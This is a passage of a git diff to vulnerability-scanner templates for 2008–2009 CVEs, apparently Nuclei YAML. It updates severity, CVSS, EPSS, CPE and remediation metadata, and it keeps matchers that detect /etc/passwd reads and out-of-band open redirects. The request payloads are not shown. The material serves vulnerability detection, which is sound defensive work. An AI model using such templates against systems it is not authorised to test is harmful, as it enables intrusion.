cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks. + remediation: | + Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: - http://www.xssing.com/index.php?x=3&y=65 - https://exchange.xforce.ibmcloud.com/vulnerabilities/45254 - https://exchange.xforce.ibmcloud.com/vulnerabilities/45252 - https://nvd.nist.gov/vuln/detail/CVE-2008-6465 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-6465 - cwe-id: CWE-80 + cwe-id: CWE-79 + epss-score: 0.00421 + epss-percentile: 0.71367 + cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: parallels + product: h-sphere shodan-query: title:"Parallels H-Sphere tags: cve,cve2008,xss,parallels,h-sphere @@ -45,4 +52,4 @@ http: status: - 200 -# Enhanced by md on 2022/12/08 +# digest: 4a0a0047304502202b4a0160f702a152cdaf2d0a92688caf411b66c5cda8df539f2ef65fb32b1552022100a69741809482dfbb00e8c4541d826a024e0e7e039f55c397a27a8f681d1c1ca6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index c0741ea067..d979e8fc53 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -3,21 +3,28 @@ id: CVE-2008-6668 info: name: nweb2fax <=0.2.7 - Local File Inclusion author: geeknik - severity: high + severity: medium description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. + remediation: | + Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/5856 - - http://web.archive.org/web/20210130035550/https://www.securityfocus.com/bid/29804 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/43172 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-6668 cwe-id: CWE-22 - tags: cve2008,nweb2fax,lfi,traversal,edb,cve + epss-score: 0.00359 + epss-percentile: 0.69047 + cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: dirk_bartley + product: nweb2fax + tags: cve2008,nweb2fax,lfi,traversal,edb,cve http: - method: GET @@ -27,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: @@ -37,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a00473045022100c6cda3c241fd520c300134b7b7b6e026d50cf70a7282b1f58e6b0a552ab971f6022056cf8f5c20daca74ceec74737d9e0d4cde245367a91802ba493c9d9b6edfca15:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 2010a10f9b..48845d507f 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -3,21 +3,29 @@ id: CVE-2008-6982 info: name: Devalcms 1.4a - Cross-Site Scripting author: arafatansari - severity: high + severity: medium description: | Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/6369 - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download - https://nvd.nist.gov/vuln/detail/CVE-2008-6982 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/44940 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-6982 cwe-id: CWE-79 + epss-score: 0.0038 + epss-percentile: 0.6993 + cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: devalcms + product: devalcms tags: cve,cve2008,devalcms,xss,cms,edb http: @@ -41,4 +49,4 @@ http: status: - 500 -# Enhanced by md on 2022/09/20 +# digest: 490a004630440220678b47179eb23ca03b74ed27803d375c2b65a964efe9248baf005fd17aff94be02200ea74e608b0d404cc3d57470f10b14e5bb624bbb9786ce241dfc08c07d55ca46:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 4b111acfa6..a16338d67f 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -6,19 +6,25 @@ info: severity: medium description: | Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action. + remediation: | + Apply the latest patches or updates provided by the vendor to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2008-7269 - https://www.exploit-db.com/exploits/6823 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2008-7269 cwe-id: CWE-20 + epss-score: 0.01358 + epss-percentile: 0.84742 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"SiteEngine" verified: "true" + max-request: 1 + vendor: boka + product: siteengine + shodan-query: html:"SiteEngine" tags: cve,cve2008,redirect,siteengine http: @@ -31,3 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# digest: 4a0a00473045022100db18229712f77ce8fd85a073adf3705e21aef663141827fb152df5e52cf6148d0220028454b9659c63fe4aa190c95439b29b569eb274d7e7d7431cce3edc65bde4d0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index a22afd3e5f..ea0802ef36 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -6,19 +6,26 @@ info: severity: medium description: | Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter. + remediation: | + Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2009-0347 - https://www.exploit-db.com/exploits/32766 - https://www.kb.cert.org/vuls/id/202753 - https://exchange.xforce.ibmcloud.com/vulnerabilities/48336 + - http://sunbeltblog.blogspot.com/2009/01/constant-stream-of-ultraseek-redirects.html classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2009-0347 cwe-id: CWE-59 + epss-score: 0.10982 + epss-percentile: 0.94498 cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: autonomy + product: ultraseek tags: cve,cve2009,redirect,autonomy http: @@ -31,3 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# digest: 4b0a00483046022100d465569a6d608c05600104627898ec52f36f08e791b5728b66747d1a5f39cbed0221008fec0753953ddb92321e4e20a69a1682c1a113249d36753cc454798f47f57aa9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 1ed6add33b..382db1a957 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -5,19 +5,27 @@ info: author: geeknik severity: critical description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. + remediation: | + Upgrade to a patched version of ZeroShell. reference: - https://www.exploit-db.com/exploits/8023 - https://nvd.nist.gov/vuln/detail/CVE-2009-0545 - http://www.zeroshell.net/eng/announcements/ - http://www.ikkisoft.com/stuff/LC-2009-01.txt + - http://www.vupen.com/english/advisories/2009/0385 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2009-0545 cwe-id: CWE-20 - tags: edb,cve,cve2009,zeroshell,kerbynet,rce + epss-score: 0.97252 + epss-percentile: 0.99786 + cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 + vendor: zeroshell + product: zeroshell + tags: edb,cve,cve2009,zeroshell,kerbynet,rce http: - method: GET @@ -30,4 +38,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/04/18 +# digest: 4a0a00473045022100ab78ce4e76d5bb8589a1c90a878873cef61e8bd9c131d05a3cf221441662e0cf02202e7be3650f19fbc75a5af390af076489f73d67cce9450b0058a718dabd1d6b9e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 1558e98fb2..6d4a2121aa 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -3,21 +3,29 @@ id: CVE-2009-0932 info: name: Horde/Horde Groupware - Local File Inclusion author: pikpikcu - severity: high + severity: medium description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. + remediation: | + Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware. reference: - https://www.exploit-db.com/exploits/16154 - http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5 - - http://web.archive.org/web/20161228102217/http://secunia.com/advisories/33695 - https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2 + - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.413.2.5 + - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.503 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N + cvss-score: 6.4 cve-id: CVE-2009-0932 cwe-id: CWE-22 - tags: cve,cve2009,horde,lfi,traversal,edb + epss-score: 0.04048 + epss-percentile: 0.91102 + cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: debian + product: horde + tags: cve,cve2009,horde,lfi,traversal,edb http: - method: GET @@ -26,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 490a0046304402203cd8d3258c92318895857ef3dd861462172a6ed609d193252ba8ad25a4843932022071b1078e19de83702ddadfa17cfe75b83d008e807eb15038f44174ee95df29c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 156a5ff2f4..6fdd15de88 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -3,8 +3,10 @@ id: CVE-2009-1151 info: name: PhpMyAdmin Scripts - Remote Code Execution author: princechaddha - severity: critical + severity: high description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + remediation: | + Update PhpMyAdmin to the latest version or apply the necessary patches. reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 @@ -12,13 +14,18 @@ info: - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php - https://nvd.nist.gov/vuln/detail/CVE-2009-1151 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-1151 - cwe-id: CWE-77 - tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce + cwe-id: CWE-94 + epss-score: 0.79256 + epss-percentile: 0.97925 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phpmyadmin + product: phpmyadmin + tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce http: - raw: @@ -33,12 +40,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/07/06 + - type: status + status: + - 200 + +# digest: 4a0a00473045022012b4c13489980d556e479690e8cd474db51c2b3687cb0c8cc541cac0fb545906022100d81647f6913573994f5f64440689bab2a9c92f93ba317f90f2ad99b15f515a63:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index ca650a0529..52b6dd20a8 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -3,21 +3,27 @@ id: CVE-2009-1496 info: name: Joomla! Cmimarketplace 0.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: | Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. + remediation: | + Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/8367 - - http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/ - https://nvd.nist.gov/vuln/detail/CVE-2009-1496 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2009-1496 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2009 + epss-score: 0.00533 + epss-percentile: 0.745 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: joomla,lfi,edb,cve,cve2009 http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a00473045022100c08412e33eac61f60b8a37b5c10229c04e909e2a56c615107a83d35fd4b68c2a022049d66dcdc24df81fafc56ae1eab165156c7f0521690938ecce2e96b7653a4f7a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 2aa7306919..637da580cd 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -5,20 +5,27 @@ info: author: daffainfo severity: high description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. + remediation: | + Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability. reference: - https://www.exploit-db.com/exploits/32954 - - https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713 - http://www.vupen.com/english/advisories/2009/1173 - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/ - https://nvd.nist.gov/vuln/detail/CVE-2009-1558 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/50231 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2009-1558 cwe-id: CWE-22 - tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb + epss-score: 0.00883 + epss-percentile: 0.80723 + cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: wvc54gca + tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb http: - method: GET @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4b0a0048304602210089352a8f2e36400601403bb91191a7ae2ff4b3bc667afe695fdf9c1660fcdfce022100f9f42ec03890e4f290137db95de6402374d1bd7d55eb081ae45f306bda6b62fc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index b9b0fe674e..553dea4017 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -5,21 +5,27 @@ info: author: princechaddha severity: medium description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. + remediation: | + Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor. reference: - - https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded - https://www.tenable.com/cve/CVE-2009-1872 - http://www.adobe.com/support/security/bulletins/apsb09-12.html - http://www.dsecrg.com/pages/vul/show.php?id=122 - https://nvd.nist.gov/vuln/detail/CVE-2009-1872 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2009-1872 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.40155 + epss-percentile: 0.96855 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.component:"Adobe ColdFusion" verified: true + max-request: 1 + vendor: adobe + product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" tags: cve,cve2009,adobe,xss,coldfusion,tenable http: @@ -30,9 +36,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -43,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a00483046022100884eb434ba338f22eeeb1416acb7886aafa5de5420e85e316da548d29fc11b52022100cf81855def95ad7ce9774098d4010b42bcb627c0455211fecc8a40ade1fc4cc4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index c435d647cc..c80b3b4143 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -5,19 +5,25 @@ info: author: daffainfo severity: high description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion). + remediation: | + Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/8898 - - http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/ - http://www.vupen.com/english/advisories/2009/1530 - https://nvd.nist.gov/vuln/detail/CVE-2009-2015 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-2015 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2009 + epss-score: 0.00797 + epss-percentile: 0.79695 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: joomla,lfi,edb,cve,cve2009 http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 490a00463044022030e53562d8ffdc5fbc596e9729fad01a7b8a098c3f93fb4d3df121b016f272d2022003eb1b705c1ad930742fd603ac5f06277d2c09f86cd9bd0c41c7fe8e072a9f4b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index cdd5418851..802f0cb250 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -3,21 +3,26 @@ id: CVE-2009-2100 info: name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. + remediation: | + Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/8946 - - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/ - https://nvd.nist.gov/vuln/detail/CVE-2009-2100 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2009-2100 cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi,edb + epss-score: 0.00528 + epss-percentile: 0.74388 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: cve,cve2009,joomla,lfi,edb http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a00473045022068543e60fc4facb4ccb5230d20cb0fa0a00abd6aa8fd5cf39b2529b7bb873ab50221008d2e4150704b669cbecc7ce7f49bfbec1ba472cb3366c0f5f130470595a83ade:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 4b0bee0bfe..dd5bcd39e4 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -3,21 +3,28 @@ id: CVE-2009-3053 info: name: Joomla! Agora 3.0.0b - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php. + remediation: | + Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/9564 - - https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 - https://nvd.nist.gov/vuln/detail/CVE-2009-3053 + - http://www.exploit-db.com/exploits/9564 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2009-3053 cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi,edb + epss-score: 0.00367 + epss-percentile: 0.69432 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: cve,cve2009,joomla,lfi,edb http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a0047304502205c85503bda607845a28b239f2f365f4529e4c04cf49a70492896024611cf3761022100ae26630b7fc4b3b4ac05af246c4efe22a86adef659fae19850bae207bc182df5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index b5158a8400..5f24da3767 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -5,19 +5,25 @@ info: author: daffainfo severity: high description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. + remediation: | + Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates. reference: - https://www.exploit-db.com/exploits/9706 - https://nvd.nist.gov/vuln/detail/CVE-2009-3318 - - https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/ - http://www.exploit-db.com/exploits/9706 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-3318 cwe-id: CWE-22 - cvss-score: 7.5 - tags: joomla,lfi,edb,cve,cve2009 + epss-score: 0.00706 + epss-percentile: 0.78205 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: joomla,lfi,edb,cve,cve2009 http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 4b0a00483046022100de0d85bd97de7af12b9af594e12a4e2e69af5663da0f3bb776b9765f67da288f022100bc4fef0c76f0851ec1cb7c7244c44574e524bfdee89ae6ad3a7ee9b7a24ad253:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index c5b12389a2..4247ff7243 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: high description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + remediation: | + Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/8870 - http://www.vupen.com/english/advisories/2009/1494 - https://nvd.nist.gov/vuln/detail/CVE-2009-4202 - - http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/ + - http://www.exploit-db.com/exploits/8870 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2009-4202 cwe-id: CWE-22 - tags: cve2009,joomla,lfi,photo,edb,cve + epss-score: 0.01956 + epss-percentile: 0.87407 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla\! + tags: cve2009,joomla,lfi,photo,edb,cve http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 4a0a0047304502206536dbb03ff052a363a8bb1a27c9f617b7b0d2ac0d3b93576899b0c6917cd7f9022100ee16eb5f362a6a74281f1a7c3c2b52ad3952aa423b472f7675148ee235f11ed4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 6dcd3e601e..ae68bd8d3a 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter. + remediation: | + Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability. reference: - https://sourceforge.net/projects/krw/ - https://www.exploit-db.com/exploits/10216 @@ -13,12 +15,17 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2009-4223 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: 